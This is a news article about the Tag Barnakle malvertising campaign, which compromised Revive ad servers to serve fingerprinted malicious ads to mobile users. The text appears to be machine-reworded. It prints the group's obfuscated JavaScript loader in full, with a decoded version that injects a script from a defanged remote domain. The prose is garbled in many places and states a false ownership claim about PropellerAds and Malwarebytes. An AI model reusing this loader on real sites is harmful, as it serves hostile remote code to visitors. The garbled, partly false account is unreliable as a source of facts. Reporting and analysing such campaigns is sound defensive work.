Millions of web surfers are being targeted by a single malvertising group

566 points

Skull and crossbones in binary code

Hackers hacked more than 120 ad servers over the past year in an ongoing campaign that displays malicious ads on tens of millions, if not hundreds of millions, devices as they visit seemingly benign sites.

Malvertising is the practice of serving ads to people while they visit trusted websites. Ads include JavaScript that sneakily exploits software flaws or attempts to trick visitors into installing an unsafe application, paying fraudulent computer support fees, or taking other malicious actions. The scammers behind this internet disaster often pretend to be buyers and pay ad delivery networks to display malicious ads on individual sites.

Go to the jugular

Hacking the ads system by pretending to be a legitimate buyer requires resources. First, fraudsters should invest time in learning how the market works and then create an entity with a trustworthy reputation. This approach also requires paying money to purchase space to display malicious ads. This is not the technology used by a group of malicious ads that the security company calls Confiant Tag Barnakle.

Author-author Elia Stein writes, “Tag Barnakle, on the other hand, is able to completely bypass this initial hurdle by going directly to the juggie – the collective compromise of ad delivery infrastructure.” A blog post was published on Monday. “ It is also possible that they will be able to generate an ROI [return on investment] That would outperform their competitors because they don’t need to spend a single cent to run the advertising campaigns. “

Over the past year, Tag Barnakle has hit over 120 running servers revive, Which is an open source application for organizations that want to run their own ad server instead of relying on a third-party service. The number 120 is twice the number of Confiant-infected Revive servers Found last year.

Once it breaks into the ad server, Tag Barnakle loads a malicious payload on it. To avoid detection, the group uses fingerprints on the client side to ensure that only a small number of the most attractive targets receive malicious ads. Servers providing secondary payload to those targets also use anonymization techniques to ensure they also fly under the radar.

Here is an overview:


When I reported to Confiant last year on Tag Barnakle, it found that the group had infected about 60 Revive servers. This feat allowed the group to distribute ads to more than 360 websites. The ads prompted bogus Adobe Flash updates that, when turned on, install malware on desktop computers.

This time, Tag Barnakle is aimed at iPhone and Android users. Websites that receive advertisement through a very opaque javascript hacker server that determines whether the visitor is using an iPhone or Android device.


In the event that visitors pass that and other fingerprinting tests, they receive a secondary load that looks like this:

var _0x209b=["charCodeAt","fromCharCode","atob","length"];(function(_0x58f22e,_0x209b77){var _0x3a54d6=function(_0x562d16){while(--_0x562d16){_0x58f22e["push"](_0x58f22e["shift"]());}};_0x3a54d6(++_0x209b77);}(_0x209b,0x1d9));var _0x3a54=function(_0x58f22e,_0x209b77){_0x58f22e=_0x58f22e-0x0;var _0x3a54d6=_0x209b[_0x58f22e];return _0x3a54d6;};function pr7IbU3HZp6(_0x2df7f1,_0x4ed28f){var _0x40b1c0=[],_0xfa98e6=0x0,_0x1d2d3f,_0x4daddb="";for(var _0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0x40b1c0[_0xaefdd9]=_0xaefdd9;}for(_0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9]+_0x4ed28f["charCodeAt"](_0xaefdd9%_0x4ed28f[_0x3a54("0x2")]))%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f;}_0xaefdd9=0x0,_0xfa98e6=0x0;for(var _0x2bdf25=0x0;_0x2bdf25<_0x2df7f1[_0x3a54("0x2")];_0x2bdf25++){_0xaefdd9=(_0xaefdd9+0x1)%0x100,_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9])%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f,_0x4daddb+=String[_0x3a54("0x0")](_0x2df7f1[_0x3a54("0x3")](_0x2bdf25)^_0x40b1c0[(_0x40b1c0[_0xaefdd9]+_0x40b1c0[_0xfa98e6])%0x100]);}return _0x4daddb;}function fCp5tRneHK(_0x2deb18){var _0x3d61b2="";try{_0x3d61b2=window[_0x3a54("0x1")](_0x2deb18);}catch(_0x4b0a86){}return _0x3d61b2;};var qIxFjKSY6BVD = ["Bm2CdEOGUagaqnegJWgXyDAnxs1BSQNre5yS6AKl2Hb2j0+gF6iL1n4VxdNf+D0/","DWuTZUTZO+sQsXe8Ng==","j6nfa3m","Y0d83rLB","Y0F69rbB65Ug6d9y","gYTeJruwFuW","n3j6Vw==","n2TyRkwJoyYulkipRrYr","dFCGtizS","yPnc","2vvPcUEpsBZhStE=","gfDZYmHUEBxRWrw4M"];var aBdDGL0KZhomY5Zl = document[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[1]), qIxFjKSY6BVD[2])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[3]), qIxFjKSY6BVD[5]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[6]), qIxFjKSY6BVD[8]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[7]), qIxFjKSY6BVD[8]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[9]), qIxFjKSY6BVD[11]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[0]), qIxFjKSY6BVD[2]));var bundle = document.body||document.documentElement;bundle[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[10]), qIxFjKSY6BVD[11])](aBdDGL0KZhomY5Zl);

When decoding, the load is:

var aBdDGL0KZhomY5Zl = document["createElement"]("script");
aBdDGL0KZhomY5Zl["setAtrribute"]("src", "https://overgalladean[.]com/apu.php?zoneid=2721667");

As the unambiguous icon shows, ads are served by overgalladean[.]com, a domain Confiant said is used by PropellerAds, an ad network owned by security companies including Malwarebytes. It has long been documented as harmful.

When Confiant restarted the Propeller Ads click tracker on the types of devices Tag Barnakle was targeting, they saw ads like this:


Tens of millions have served

Ads often attract targets to the App Store listing for fake security or security, or VPN apps with hidden subscription costs or “traffic off nefarious ends”.

With ad servers frequently integrating with multiple ad exchanges, ads can spread widely across hundreds, perhaps thousands, of individual websites. Confiant doesn’t know how many end users are being exposed to false ads, but the company thinks the number is high.

If we consider that some of these media companies have [Revive] Through integration with leading automated advertising platforms, Tag Barnakle is easily accessible in tens if not hundreds of millions of devices, “Stein wrote.” This is a conservative estimate that takes into account the fact that they wrap their victims in order to detect payload at low frequency, and potentially That slows down the discovery of their presence. “

Like it? Share with your friends!

566 points

What's Your Reaction?

hate hate
confused confused
fail fail
fun fun
geeky geeky
love love
lol lol
omg omg
win win